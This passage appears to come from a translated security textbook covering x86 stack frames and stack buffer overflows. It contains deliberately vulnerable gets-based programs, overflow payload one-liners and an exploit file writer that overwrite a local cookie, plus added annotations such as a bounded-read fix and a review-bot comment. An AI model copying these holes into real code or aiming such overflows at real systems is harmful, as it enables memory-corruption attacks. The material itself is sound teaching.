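/* CALL target: push the address of the next instruction ($ + length of the CALL,
 * 5 bytes for CALL rel32), then load EIP with the target. */
int call(Cpu *c, uint32_t target, uint32_t call_len) {
    if (!push(c, c->eip + call_len)) return 0;
    c->eip = target;
    return 1;
}

/* RET: pop the top of the stack straight into EIP. */
int ret(Cpu *c) {
    uint32_t target;
    if (!pop(c, &target)) return 0;
    c->eip = target;
    return 1;
}

/* Replays Figures 2.7 and 2.8: with ESP = BFFFF6C0 and EIP at the PUSH in main,
 * push printf's argument 08048580, CALL printf (at B7EF22F0), then RET from it.
 * Returns the EIP after the RET, which should be 08048453. */
uint32_t replay_call_and_ret(Cpu *c) {
    memset(c, 0, sizeof *c);
    c->esp = 0xBFFFF6C0;
    c->eip = 0x08048449;            /* PUSH 0x08048580 */
    push(c, 0x08048580);            /* BFFFF6BC now holds 80 85 04 08 */
    c->eip = 0x0804844E;            /* CALL printf */
    call(c, 0xB7EF22F0, 5);         /* BFFFF6B8 now holds 53 84 04 08 */
    ret(c);                         /* EIP <- 08048453, ESP back to BFFFF6BC */
    return c->eip;
}

/* The observation closing Section 2.2.4.4: RET takes its target from memory, so
 * whatever the slot at ESP holds when RET executes becomes the next EIP. Here
 * that slot is overwritten in the model with a constructed marker value. */
uint32_t ret_follows_stack_contents(Cpu *c, uint32_t marker) {
    memset(c, 0, sizeof *c);
    c->esp = 0xBFFFF6BC;
    c->eip = 0x0804844E;
    call(c, 0xB7EF22F0, 5);         /* saved return address 08048453 at BFFFF6B8 */
    store32(c, c->esp, marker);     /* the saved address is replaced before RET */
    ret(c);
    return c->eip;                  /* equals marker, not 08048453 */
}

int main(void) {
    Cpu c;
    uint32_t eip = replay_call_and_ret(&c);
    printf("EIP after RET = %08X, ESP = %08X\n", eip, c.esp);
    return 0;
}
```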
[Figure 2.7: Before and after CALL. (a) Before: EIP = 0804844E, the CALL printf in main (preceded by ADD ESP, -0x0C and PUSH 0x08048580, followed by ADD ESP, 0x10); the top of the stack holds 80 85 04 08 (the argument 08048580) and the slot below it is undefined. (b) After: EIP = B7EF22F0, the first instruction of printf (PUSH EBP; MOV EBP, ESP); ESP has moved down one slot, which now holds 53 84 04 08, the return address 08048453.]

[Figure 2.8: Before and after RET. (a) Before: EIP = B7EF2328, the RET at the end of printf (after ADD ESP, 0x10; POP EBX; POP EBP); the top of the stack holds 53 84 04 08, with 80 85 04 08 above it. (b) After: EIP = 08048453, the ADD ESP, 0x10 following CALL printf in main; ESP has moved up one slot, back to the argument 80 85 04 08.]
2.3 The compiler and the structure of a function

The compiler translates code in a higher-level language such as assembly, C, or Pascal into machine code. In this section we look at how GCC version 2.95 compiles a simple function written in C into assembly. The C code is listed below:

    int func(int a, int b)
    {
        int c;
        char d[7];
        short e;
        return 0;
    }

This is a function named func with two automatic variables (its parameters): a of type int and b, also of type int. The function also has three local variables: c of type int, d, an array of 7 char, and e of type short. The function returns a value of type int.

For any C function, the compiler produces a corresponding function with three parts:

Prologue: the beginning of the function. It saves information about the frame of the caller (the function that called the one under consideration, the callee) and allocates memory for the local variables before the body executes.

Body: the main part of the function, containing the instructions that do the function's work.

Epilogue: the end of the function. It releases the memory allocated in the prologue and restores the caller's frame.
2.3.1 Prologue

Normally the prologue consists of two main instructions and one auxiliary instruction, as follows:

    PUSH EBP
    MOV EBP, ESP
    SUB ESP, 0x20

The first two instructions save the value of EBP on the stack and then assign the current value of the stack pointer to EBP. After them, EBP and ESP both point to the same stack slot, and that slot holds the old EBP value (the saved EBP).

The third instruction lowers the stack pointer by a fixed number of units; in the example above ESP is decreased by 20 (hexadecimal) units. This gap is the memory allocated to the function's local variables, so the value in the third instruction must always be greater than or equal to the total size of the local variables. Let us work out how many bytes this function needs for them. First, c is an int, so GCC allocates 4 bytes. Next, d is an array of 7 char; GCC allocates 1 byte per char, so d receives 8 bytes. No, the author has not slipped when multiplying one by seven. The result of 7 x 1 is indeed 7, but to optimise memory access speed, and because the stack pointer always holds a value divisible by 4, GCC allocates 8 bytes instead of 7. Finally, e receives 4 bytes instead of the 2 bytes of a short, for the same reason. In total, the memory to allocate for local variables is 4 + 8 + 4 = 10 (hexadecimal, following our convention). ESP must therefore be lowered by at least 10 units; in this example it is lowered by 20 units, more than needed.

Within the cells set aside for local variables, each variable's position on the stack follows the order of its appearance in the C source. If the source had only one local variable c, the 4 bytes would be reserved for c alone. If it had two local variables c and d, in that order, the first 4 bytes would go to c and the next 8 bytes to d. Likewise, in our example the first 4 bytes are for c, the next 8 for d, and the last 4 for e, as in Figure 2.9.

[Figure 2.9: Positions of the local variables on the stack. From higher to lower addresses: ..., the saved EBP (pointed to by EBP), c (one slot), d (two slots), e (one slot), then four unused padding slots down to the slot pointed to by ESP; the region below the saved EBP spans 20 (hexadecimal) bytes.]
2.3.2 Body
The function body consists of the instructions that accomplish the function's purpose. In our simple example, the body has only one instruction, XOR EAX, EAX. This instruction performs a logical XOR between the EAX register and itself, storing the result back into EAX. After the instruction executes, EAX holds the value 0.
There are two things to note here. First, in the C code we used the statement return 0, and this statement corresponds to the XOR instruction above. This tells us that a function's return value is stored in the EAX register. Second, the value of the EBP register does not change within the function body. This point is not made explicit in the example, but it will be discussed in the next section.
2.3.3 Epilog
Like the prolog, the epilog consists of two main instructions and one auxiliary instruction:
    MOV ESP, EBP
    POP EBP
    RET
The first two instructions perform the reverse of the prolog. The current value of EBP is assigned to the stack pointer, and then EBP is restored with the value saved on the stack.
The question here is which value on the stack is assigned to EBP. Recall that in the prolog, the old EBP value was saved with the instruction PUSH EBP. In the epilog, that very value is restored by POP EBP. For this to work, the EBP value clearly must not change throughout the function body, so that when the stack pointer is restored, ESP returns to the slot holding the old EBP value.
A small point the reader will notice is that the number of PUSH instructions and the number of POP instructions usually balance each other. Since we have PUSH EBP in the prolog, we have POP EBP in the epilog. This is precisely the stack's ability to hold temporary data. When we need to save a value on the stack we use PUSH, and when we take it back we use POP.
The third instruction transfers the flow of control back to the caller. Thus, immediately after the old EBP value on the stack there must be the return address that RET uses. And after RET executes, the stack pointer points to the slot above the return address. Figure 2.10 describes the memory layout of the simple function example we have just discussed.
The reader should also note that the order of instructions presented here is the most common one; in practice the reader may find that these instructions, while still following this order, have other instructions interleaved between them, or are replaced by equivalent instructions. This is due to the compiler's optimization process and is examined in more detail in the training program at the author's center.
At this point we conclude our discussion of the positions of local variables on the stack and of the function's return value. The next section continues with the function's arguments (parameters).
2.3.4 Calling a function
Recall that the function func takes two arguments, a and b, both of type int, with a declared before b. When translating to assembly, the compiler turns calls to func into the following instructions:
    PUSH b
    PUSH a
    CALL func
So the two arguments are pushed onto the stack, through the two PUSH instructions, in the reverse of the order in which they were declared. CALL then pushes the return address onto the stack and moves the instruction pointer to the prolog of func. Combining this with what we discussed in Subsection 2.3.1, we can build a complete model of a function's stack layout, as illustrated in Figure 2.11.
All the stack slots from the position of the last argument (the slot of b) down to the position of the last local variable (the slot of e) are called a stack frame. Each stack frame holds the state of one function as we have discussed, including the arguments, the function's return address, the caller's frame information, and the local variables. Each frame corresponds to one function call that has not yet finished. For example, if main calls func and func is executing, we have the stack frames shown in Figure 2.12.
Figure 2.10: Memory and registers after the function has finished (figure: EBP again holds the old EBP value and ESP points just above the slot that held the return address; below it remain the stale slots of the return address, old EBP, c, d and e)
2.3.5 The frame pointer
An executing function can access its state data through the frame pointer. The frame pointer always points at a fixed position within a frame. Other data are accessed through their position relative to the frame pointer. This is like saying that the A key is three keys to the left of the F key: since we can always locate the F key, because it is the key with the bump for the left hand on the keyboard, we can locate the A key. Our frame pointer is EBP, since EBP always points at the stack slot holding the old EBP value, and every other object can be located from the value of the EBP register. For example, variable c is pointed to by EBP-4, and variable d is pointed to by EBP-C.
Taking the EBP register as the reference point, we also see that the other objects are arranged quite sensibly, and this explains why a function's arguments are pushed onto the stack in reverse order. The first argument is then at EBP+8 and the second at EBP+C, that is, the memory addresses of the arguments increase in declaration order. Likewise, the addresses of the local variables decrease in declaration order.
Furthermore, we can fully determine the roles of the other stack slots in a frame once we have determined the role of any one of them. Just as, once we know which key any given key on the keyboard is, we can find the A key because the keyboard layout does not change. With the memory layout of a function established in Figure 2.11, suppose we determine that the stack slot at address 6789ABCC holds the function's return address; then the slot at address 6789ABC8 holds the caller's EBP value, and the slot at address 6789ABD0 is the first argument, as in Figure 2.13.
Figure 2.11: Stack model of a function (figure: from high to low addresses, b, a, return address, old EBP pointed to by EBP, c, d, e; the span from b to e is the stack frame)
Figure 2.12: Stack frames (figure: main's frame holds the arguments of main, a return address, the old EBP and main's local variables; below it func's frame holds the arguments of func, the return address into main, the EBP of main, and func's local variables)
Figure 2.13: Determining the roles of stack slots (figure: (a) Determining the role of one slot: 6789ABCC holds the return address; (b) Determining the roles of the remaining slots: argument 2, argument 1 at 6789ABD0, return address at 6789ABCC, the caller's EBP at 6789ABC8, then the local variables)
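The slot-rounding rule and the EBP-relative offsets described in Section 2.3, as an added example that is not part of the book: a C program (the names compute_layout, local_offset and arg_offset are assumed for the example) that applies the one-4-byte-slot-per-local rule attributed to GCC 2.95 and checks it against func()'s locals c, d and e.

```c
#include <stdio.h>

/* Added example, not from the book: models the GCC 2.95 local-variable layout
 * described in Section 2.3. Each local is rounded up to whole 4-byte stack
 * slots and placed below the saved EBP in declaration order; arguments sit
 * above the return address starting at EBP+8. Function and struct names here
 * are assumed for the example, not the compiler's or the book's. */

#define MAX_LOCALS 16

struct layout {
    int n_locals;
    int slot_bytes[MAX_LOCALS];   /* bytes actually reserved for each local */
    int offset[MAX_LOCALS];       /* signed offset from EBP, e.g. -4 or -0xC */
    int frame_bytes;              /* least amount the prolog must subtract from ESP */
};

/* Round a size up to a multiple of 4, the slot width on 32-bit x86
 * (7 bytes of char d[7] become an 8-byte slot, a 2-byte short a 4-byte one). */
static int round_to_slot(int size)
{
    return (size + 3) & ~3;
}

/* Fill *out for locals declared with the given sizes, in declaration order.
 * Returns the minimum frame size, or 0 if the inputs are unusable. */
int compute_layout(const int *sizes, int n, struct layout *out)
{
    int used = 0;
    if (n < 0 || n > MAX_LOCALS) return 0;
    out->n_locals = n;
    for (int i = 0; i < n; i++) {
        int slot = round_to_slot(sizes[i]);
        used += slot;                  /* each local goes just below the previous one */
        out->slot_bytes[i] = slot;
        out->offset[i] = -used;        /* first local at EBP-4, next at EBP-(4+8), ... */
    }
    out->frame_bytes = used;
    return used;
}

/* EBP-relative offset of the i-th local (0-based), or 0 when out of range. */
int local_offset(const int *sizes, int n, int i)
{
    struct layout l;
    if (i < 0 || i >= n || compute_layout(sizes, n, &l) == 0) return 0;
    return l.offset[i];
}

/* EBP-relative offset of the i-th argument (0-based): EBP+8, EBP+0xC, ...
 * Arguments were pushed right to left, so the first one is nearest to EBP. */
int arg_offset(int i)
{
    return 8 + 4 * i;
}

int main(void)
{
    /* int c; char d[7]; short e;  -- the locals of the book's func() */
    int sizes[] = { (int)sizeof(int), 7 * (int)sizeof(char), (int)sizeof(short) };
    const char *names[] = { "c", "d", "e" };
    struct layout l;
    int frame = compute_layout(sizes, 3, &l);

    for (int i = 0; i < l.n_locals; i++)
        printf("%s: %d-byte slot at EBP-0x%X\n", names[i], l.slot_bytes[i],
               (unsigned)-l.offset[i]);
    printf("minimum SUB ESP, 0x%X (the book's prolog reserves 0x20)\n", (unsigned)frame);
    printf("a at EBP+0x%X, b at EBP+0x%X\n", (unsigned)arg_offset(0), (unsigned)arg_offset(1));
    return 0;
}
```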
2.4 Summary and points to remember
- The binary, decimal, and hexadecimal number systems can be converted between one another using mathematical formulas. Conversion between binary and hexadecimal can also use a lookup table of 4-bit groups.
- Computers use only the binary system, so a convention is needed to represent letter characters. The ASCII table is one such convention.
- The 32-bit Intel x86 processor has general-purpose registers, stack registers, and the flags register.
- Memory is addressed linearly according to the width of the address bus (32 bits). Intel CPUs access memory in little-endian order: the byte at the lower address is less significant than the byte at the higher address.
- The instruction set is the CPU's vocabulary, consisting of machine code, also called the first-generation programming language. Assembly is the vocabulary meant for humans, also known as the second-generation programming language.
- There are many instruction groups, such as jump instructions, function instructions, stack instructions, and arithmetic instructions. These instructions usually have a syntax with two operands, where the first operand typically receives the result of the instruction.
- The stack is a memory region the operating system grants a program when loading it into memory. The stack holds information about the program's local variables and about the program's execution. The instructions that affect the stack are mainly PUSH, POP, CALL, and RET. These instructions change the value of the ESP register, also called the stack pointer. PUSH decreases the value of ESP, while POP increases it. The stack pointer always points to the top of the stack.
- The compiler translates a higher-level language into machine code.
- A function is usually compiled into three parts: prolog, body, and epilog. The prolog sets up the function's frame and saves information about the caller's frame. The body performs the work that achieves the function's purpose. The epilog reclaims the frame allocated in the prolog and restores the caller's frame.
- A function's return value is usually held in the EAX register.
- When a function is called, its arguments are pushed onto the stack in the reverse of the order in which they were declared.
- In GCC 2.95, a function's local variables are allocated stack slots in the order in which they were declared. To optimize memory access, the smallest unit allocated to a local variable is one stack slot.
- A function's stack frame begins with the arguments, then the return address, the old EBP value, and the local variables. This model does not change, so once the role of one stack slot is determined, the roles of the other slots are determined as well.
- The roles of the stack slots in a function's frame can also be determined and accessed through the frame pointer EBP. The value of EBP does not change throughout the function's execution and always points to the slot holding the caller's EBP value.
Chapter 3
Buffer overflow
Buffer overflow is an ordinary, easily avoided kind of bug, yet it is the most widespread and dangerous one. From the time it became known until today, buffer overflow has always been listed among the bugs that most seriously threaten system security. In 2009, the SANS organization published a report on the 25 most dangerous programming errors [1], and it still includes buffer overflow.
In this chapter we will examine what a buffer overflow really is, and the usual ways of exploiting it: changing the value of a variable, returning into the function itself, returning into the standard library, and chaining several returns into the standard library. We will go through a series of examples, from basic to complex, to recognize the important values in a program's execution.
3.1 Introduction
A buffer overflow is a bug that occurs when the data being processed (usually input data) is longer than the limit of the memory region that holds it. It is that simple.
However, if the memory beyond this region holds data that is important to the program's execution, the excess data may corrupt this important data. Depending on how the program handles the important data, the exploiter may be able to steer the program into performing the desired action.
Figure 3.1 describes the position of the data and the overflow process.
From it we recognize three essential points in exploiting a buffer overflow:
1. The important data must lie after the data that can overflow. If, in Figure 3.1, the important data lay to the left, then no matter how much the data overflowed it could not change the important data.
2. The overflowing data must reach the important data. Sometimes we can overflow a buffer with a small amount of data, but not enough to change the value of important data that lies far away.
3. Finally, the changed important data must still be meaningful to the program. In many cases, although we can change the important data, in the process we also change other data (for example, logic flags) and cause the program to skip using the important data altogether. This is a basic principle of the stack-exploitation countermeasures in modern compilers. These mechanisms are discussed in detail in the advanced curriculum at the author's training center.
[1] http://www.sans.org/top25errors
Figure 3.1: Buffer overflow (figure: (a) A little data: the input data lies before the important data; (b) Longer input data: the input grows toward the important data; (c) The important data is overwritten)
Having grasped the principle of buffer overflow, we are ready to examine a series of examples to find out what the important data consists of and how to use it. In all of the following examples, the goal we want to achieve is to have the text You win! printed on the screen.
    #include <stdio.h>

    int main()
    {
        int cookie;
        char buf[16];
        printf("&buf: %p, &cookie: %p\n", buf, &cookie);
        gets(buf);
        if (cookie == 0x41424344)
        {
            printf("You win!\n");
        }
    }
Listing 3.1: stack1.c
3.2 Changing the value of a local variable
Listing 3.1 is our first example. To compile examples like this we use the command syntax gcc -o <name> <name.c> as in the screen capture below.
    regular@exploitation:~/src$ gcc -o stack1 stack1.c
    /tmp/ccxYIaRx.o: In function main:
    stack1.c:(.text+0x26): warning: the gets function is dangerous and should not be used.
The reader will easily notice that GCC warns about the danger of using the gets function. We ignore this warning because this is exactly the function that will cause the buffer overflow, the subject we are discussing in this chapter. The reader should also note the GCC version in use, which is version 2.95.
    regular@exploitation:~/src$ gcc -v
    Reading specs from /usr/lib/gcc-lib/i486-linux-gnu/2.95.4/specs
    gcc version 2.95.4 20011002 (Debian prerelease)
To exploit a bug successfully, the exploiter must understand clearly how the program works. Listing 3.1 receives a string from standard input (stdin) through the gets function. If the value of the local variable cookie is 41424344, it prints the text You win! to standard output (stdout). The variable cookie plays the role of an important piece of data in the program's operation.
By understanding how the program works, we see that the program itself already contains the code that performs the desired action (printing You win! on the screen). Therefore one path to reaching the goal here is to assign cookie the value 41424344.
Besides understanding how the program works, the exploiter obviously has to find where the bug originates. We are fortunate that GCC has told us the bug lies in the gets function. The problem now becomes how to exploit the gets bug to assign cookie the value 41424344.
The gets function reads a string from standard input and places it in a buffer. The string terminator (ASCII code 00) is also appended automatically by gets. The function does not check the size of the memory region used to hold the input, so a buffer overflow occurs if the input is longer than the size of the buffer.
The memory region passed to gets to hold the input is the local variable buf. In memory, the layout of main's local variables is determined as in Figure 3.2. Because cookie is declared first, cookie is allocated stack memory first, which means cookie lies at a higher address than buf and therefore after buf in memory.
If we enter the 6 characters abcdef, the memory state will be as in Figure 3.3a; with the 10 (hexadecimal) characters 0123456789abcdef, the first byte of cookie is overwritten with the string terminator; and with the 14 (hexadecimal) characters 0123456789abcdefghij, the whole of cookie comes under our control.
For cookie to have the value 41424344, the bytes of cookie must hold, in order, 44, 43, 42, 41, following the little-endian convention of the Intel x86 processor. Figure 3.3d illustrates the memory state we need to reach for You win! to be printed on the screen.
Figure 3.2: Positions of cookie and buf (figure: from high to low addresses, return address, old ebp, cookie, then the four 4-byte slots of buf)
Figure 3.3: Overflowing buf and the target state (figure: (a) 6-character string: buf holds 61 62 63 64 / 65 66 00 XX and cookie is untouched; (b) 10-character string: buf is filled with 30 31 32 33 / 34 35 36 37 / 38 39 61 62 / 63 64 65 66 and the first byte of cookie is 00; (c) 14-character string: buf is filled, cookie holds 67 68 69 6A, and the byte after cookie is 00; (d) Target state: cookie holds 44 43 42 41)
Thus, the data we need to feed the program is 10 (hexadecimal) arbitrary characters to fill buf, followed by 4 characters with ASCII codes 44, 43, 42, and 41 respectively. These four characters are D, C, B, and A according to Table 2.2. The following capture is the result when we enter 10 characters a followed by DCBA.
    regular@exploitation:~/src$ ./stack1
    &buf: 0xbffffa44, &cookie: 0xbffffa54
    aaaaaaaaaaaaaaaaDCBA
    You win!
    regular@exploitation:~/src$
We have successfully exploited the program's buffer overflow to overwrite an important local variable. What we gained from this example is mainly the answer to an important question: what data to enter. In the following examples we will meet similar general questions that every exploitation must answer.
    #include <stdio.h>

    int main()
    {
        int cookie;
        char buf[16];
        printf("&buf: %p, &cookie: %p\n", buf, &cookie);
        gets(buf);
        if (cookie == 0x01020305)
        {
            printf("You win!\n");
        }
    }
Listing 3.2: stack2.c
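The fix a defender would apply to stack1.c and its siblings, as an added example that is not the book's code: gets() is replaced by a bounded reader built on fgets (the names read_line_bounded and hardened_main_from are assumed for the example), which keeps every write inside buf and reports a line that did not fit, so an over-long line is rejected instead of silently spilling into cookie; the same replacement covers the later stack2 to stack5 variants, since only the comparison changes between them.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not from the book: a bounded replacement for gets() in the
 * stack1.c family. fgets() never stores more than size-1 bytes plus the
 * terminator, so buf cannot spill into cookie. Function names are assumed. */

enum { LINE_OK = 0, LINE_TOO_LONG = 1, LINE_EOF = -1 };

/* Read one line from `in` into buf[size], stripping the trailing newline as
 * gets() would. Returns LINE_OK; LINE_TOO_LONG when the line did not fit (the
 * buffer holds its first size-1 bytes and the rest of the line is consumed so
 * the next call starts on a fresh line); or LINE_EOF when nothing was read. */
int read_line_bounded(FILE *in, char *buf, size_t size)
{
    if (size == 0) return LINE_EOF;
    buf[0] = '\0';
    if (fgets(buf, (int)size, in) == NULL)
        return LINE_EOF;

    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return LINE_OK;
    }
    /* No newline in buf: the input ended without one, or the line was longer. */
    int c = fgetc(in);
    if (c == EOF) return LINE_OK;
    while (c != '\n' && c != EOF)        /* drain the remainder of the long line */
        c = fgetc(in);
    return LINE_TOO_LONG;
}

/* Hardened counterpart of stack1.c's main(), reading from `in` instead of
 * stdin: same locals, same check, but the read is bounded and an over-long
 * line is rejected. Returns 1 if the line was accepted, 0 if rejected. */
int hardened_main_from(FILE *in)
{
    int cookie = 0;                      /* initialised; nothing else ever writes it */
    char buf[16];
    if (read_line_bounded(in, buf, sizeof buf) == LINE_TOO_LONG) {
        fprintf(stderr, "line longer than %zu bytes rejected\n", sizeof buf - 1);
        return 0;
    }
    if (cookie == 0x41424344)            /* no longer reachable through input */
        printf("You win!\n");
    return 1;
}

/* Turns constructed sample text into a stream (ISO C tmpfile, no fmemopen). */
static FILE *text_as_stream(const char *text)
{
    FILE *f = tmpfile();
    if (f == NULL) return NULL;
    fwrite(text, 1, strlen(text), f);
    rewind(f);
    return f;
}

/* Status of the n-th (1-based) bounded read over `text`; contents left in out. */
int read_nth_line(const char *text, int n, char *out, size_t outsz)
{
    FILE *in = text_as_stream(text);
    int status = LINE_EOF;
    if (in == NULL) return LINE_EOF;
    for (int i = 0; i < n; i++)
        status = read_line_bounded(in, out, outsz);
    fclose(in);
    return status;
}

/* 1 if the n-th line, read into an outsz-byte buffer, equals expect. */
int nth_line_equals(const char *text, int n, size_t outsz, const char *expect)
{
    char out[64];
    out[0] = '\0';
    if (outsz > sizeof out) return 0;
    read_nth_line(text, n, out, outsz);
    return strcmp(out, expect) == 0;
}

int main(void)
{
    /* Constructed sample: the 20-byte line that overwrote cookie in stack1. */
    FILE *in = text_as_stream("aaaaaaaaaaaaaaaaDCBA\n");
    int accepted = in != NULL && hardened_main_from(in);
    if (in != NULL) fclose(in);
    printf("line accepted: %s\n", accepted ? "yes" : "no");   /* prints "no" */
    return 0;
}
```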
3.3 Feeding data into the program
The second question the exploiter must answer is how to feed data into the program. Sometimes the program reads from standard input, sometimes from a file, and at other times from a socket. We have to know where the program receives its data from so that we can deliver the necessary data to it through that path.
Listing 3.2 is very close to the previous example. The only difference between the two programs is the comparison value 01020305.
regular@exploitation:~/src$ diff -u stack1.c stack2.c
--- stack1.c 2009-01-18 13:14:00.000000000 +0700
+++ stack2.c 2009-01-18 13:14:00.000000000 +0700
@@ -6,7 +6,7 @@
char buf[16];
printf("&buf: %p, &cookie: %p\n", buf, &cookie);
gets(buf);
- if (cookie == 0x41424344)
+ if (cookie == 0x01020305)
{
printf("You win!\n");
}
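Review bot: the hunk changes only the comparison constant; the `gets(buf)` call in its context lines is still unbounded, so the 16-byte `buf` can be overrun into `cookie` whatever the constant is. If this were meant as a fix, the read would need bounding, e.g. `fgets(buf, sizeof buf, stdin);`, so that the comparison only ever sees what the program itself stored in `cookie`.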
The reader will easily recognize that the exploit data consists of 10 (hexadecimal) arbitrary characters to fill buf and 4 characters with ASCII codes 5, 3, 2, and 1 respectively. However, these characters are non-printable and not on the keyboard, so entering the data from the keyboard will not work.
Stop and think
If the program reads from standard input, how many ways are there to deliver data to it?
Since the program reads from standard input, we can use the following ways to pass data through standard input:
Redirection: standard input can be redirected from the keyboard to a file using the < character, as in the command ./stack1 < input. When this command runs, the contents of the file input are used in place of standard input. Every read from standard input will read from this file.
Pipe: a pipe is a form of interprocess communication (IPC) in which one program sends data to another program. Standard input can be redirected to become the receiving end of a pipe, as in the command ./sender | ./receiver. The program before the | character (hold Shift and press \) is the program sending data; its standard output sends data into the pipe instead of to the screen. The program after the | character is the program receiving data; its standard input reads data from the pipe instead of from the keyboard.
With these two methods, any character can be delivered to the program through standard input. For example, to exploit Listing 3.2 with the first method, we create a file containing the input data using Listing 3.3. Then we run the buggy program and redirect its standard input to the file just created.
    #include <stdio.h>

    int main(int argc, char *argv[])
    {
        char s[] = "aaaaaaaaaaaaaaaa\x05\x03\x02\x01";
        FILE *f = fopen(argv[1], "wb");
        fwrite(s, 1, sizeof(s), f);
        fclose(f);
        return 0;
    }
Listing 3.3: exp2.c
    regular@exploitation:~/src$ gcc -o exp2 exp2.c
    regular@exploitation:~/src$ ./exp2 redirect
    regular@exploitation:~/src$ ./stack2 < redirect
    &buf: 0xbffffa44, &cookie: 0xbffffa54
    You win!
    regular@exploitation:~/src$
If we use the second method, exploitation is simpler, because we can use built-in commands such as echo to pass the special characters through the pipe.
    regular@exploitation:~/src$ echo -e "aaaaaaaaaaaaaaaa\005\003\002\001" | ./stack2
    &buf: 0xbffffa44, &cookie: 0xbffffa54
    You win!
    regular@exploitation:~/src$
We can even use (and the reader is encouraged to use) scripting languages to simplify this work. The reader may use whichever scripting language is familiar. In this document the author presents examples in the Python language [2].
    regular@exploitation:~/src$ python -c 'print "a"*16 + "\x05\x03\x02\x01"' | ./stack2
    &buf: 0xbffffa44, &cookie: 0xbffffa54
    You win!
    regular@exploitation:~/src$
We end the second example here with the following points worth noting:
- The way data is fed into the program is as important as the data itself.
- Knowledge of, and the habit of using, a scripting language will save much time and effort during exploitation.
[2] http://www.python.org
    #include <stdio.h>

    int main()
    {
        int cookie;
        char buf[16];
        printf("&buf: %p, &cookie: %p\n", buf, &cookie);
        gets(buf);
        if (cookie == 0x00020300)
        {
            printf("You win!\n");
        }
    }
Listing 3.4: stack3.c
Stop and think
With what we have discussed in this chapter, can the reader exploit the bug in Listing 3.4? A sample answer can be found in the footnote [3] at the bottom of the page.
3.4 Changing the flow of execution
3.4.1 The old technique
In the previous two examples we changed the value of an important local variable to influence the result of the program's execution. We will apply that technique to examine the example in Listing 3.5.
The only difference between this example and the previous ones is that cookie is checked against 000D0A00, so we guess that a small modification to the same exploit command line will produce the same result.
    regular@exploitation:~/src$ python -c 'print "a"*16 + "\x00\x0A\x0D\x00"' | ./stack4
    &buf: 0xbffffa44, &cookie: 0xbffffa54
    regular@exploitation:~/src$
Unfortunately, we no longer see You win! printed on the screen. Is there a mistake in the exploit command? Or is our calculation off because the memory layout has changed?
[3] python -c 'print "a"*16 + "\x00\x03\x02\x00"' | ./stack3
    #include <stdio.h>

    int main()
    {
        int cookie;
        char buf[16];
        printf("&buf: %p, &cookie: %p\n", buf, &cookie);
        gets(buf);
        if (cookie == 0x000D0A00)
        {
            printf("You win!\n");
        }
    }
Listing 3.5: stack4.c
Stop and think
Can the reader explain why?
Checking the result of running the command, we can rule out the first possibility: the command ran cleanly, so its syntax must have been correct. Because Listing 3.5 makes no change to the local variables of main, main's stack layout must still be as illustrated in Figure 3.2. Ruling out these two cases leads us to the last reasonable conclusion: the value of cookie was not changed to 000D0A00. But why was the value of cookie changed to exactly the desired value in the previous examples?
The reason cookie gets changed is that buf overflows and spills over into cookie's memory. Since the data is received from standard input into buf through the gets function, we will study gets more closely.
Reading the documentation of gets with the command man gets gives us the following information:
    gets() reads a line from stdin into the buffer pointed to by s until
    either a terminating newline or EOF, which it replaces with \0.
In other words (the emphasis is ours): gets() reads a line from standard input into the buffer pointed to by s until it meets a newline character or EOF, and that character is replaced with \0.
As mentioned in Subsection 2.1.3, the newline character has ASCII code 0A. On meeting this character, gets stops receiving data and replaces it with the character of ASCII code 0 (the string terminator). Therefore, the stack state of main for our exploit command is as illustrated in Figure 3.4.
Because input is cut off at the newline character, the two characters with ASCII codes 0D and 00 are not written into cookie. Moreover, the newline character itself is turned into the string terminator. Hence the value of cookie cannot be set to the desired value, and we need a different way to exploit the bug.
Figure 3.4: Input string cut off at 0A (figure: buf is filled with 61 bytes and cookie holds 00 00 XX XX; reading stops at 0A and that byte is replaced with 00)
3.4.2 Control flow
Let us review how the program in Listing 3.5 executes. First, the operating system loads the program into memory and calls the main function. The first thing main does is call printf to print a line of information on the screen; then main calls gets to receive data from standard input. When gets finishes, main compares the value of cookie with a fixed value. If the two values are equal, the string You win! is printed on the screen. Finally, main ends and returns to the operating system's loader. This process is described in Figure 3.5.
In the previous examples, we steered the flow of execution at the diamond so that the program followed the "equal" arrow and called printf to print to the screen. With the example in Listing 3.5, we no longer have the ability to choose the comparison branch. However, we can still use the code in that "equal" branch if we can bring the instruction pointer to the location of the branch.
Stop and think
Does the reader have any idea?
Since we cannot enter the "equal" branch, our program will always take the "not equal" branch and proceed to the epilog of main. Recall from Subsection 2.3.3 that a function's epilog loads the instruction pointer with the value saved on the stack in order to return to the function that called it. Normally, main's epilog returns to the operating system's loader, as illustrated. In other, special, cases the epilog can return to an arbitrary location. And it would be wonderful if that location were the "equal" branch, as in Figure 3.6.
The factor deciding where the epilog returns to is the return address saved on the stack. In Figure 3.2, this address lies after buf and can therefore be completely overwritten if the input data is 1C (28 decimal) characters or longer.
Thus we have found a new direction for exploiting Listing 3.5. The remaining problem is to find the address of the "equal" branch.
Figure 3.5: Control-flow diagram (figure: loader, then main: prolog, printf, gets, the comparison cookie = 000D0A00?, with the "equal" arrow leading to printf and then the epilog, and the "not equal" arrow leading straight to the epilog)
Figure 3.6: Returning into the function body itself (figure: the same diagram, but the epilog's return leads back to the printf of the "equal" branch instead of the loader)
3.4.3 Finding the address of the "equal" branch
There are many ways to find the address of the "equal" branch in a program. Application security experts usually use the Interactive DisAssembler (IDA) to handle everything. IDA is provided, and its use taught, in the author's classroom course, but to reduce the number of trees felled for printing many pictures we will look at other ways. Using the GDB debugger, or the objdump tool, are the two ways we discuss here.
3.4.3.1 With GDB
Debugging is the work of studying a program's behaviour to find out why the program behaves one way or another. The common debugger on Linux is GDB. To use GDB, we run a command with the syntax gdb <cmd>. For example, to debug stack4 we use the command in the capture below.
    regular@exploitation:~/src$ gdb ./stack4
    GNU gdb 6.4.90-debian
    Copyright (C) 2006 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    welcome to change it and/or distribute copies of it under certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB. Type "show warranty" for details.
    This GDB was configured as "i486-linux-gnu"...Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
    gdb$
GDB shows the prompt gdb$ and waits for commands. If we enter x/22i main, GDB displays (x) on the screen the first 22 (decimal) assembly instructions (i) of the main function.
gdb$ x/22i main
0x8048470 <main>: push ebp
0x8048471 <main+1>: mov ebp,esp
0x8048473 <main+3>: sub esp,0x28
0x8048476 <main+6>: add esp,0xfffffffc
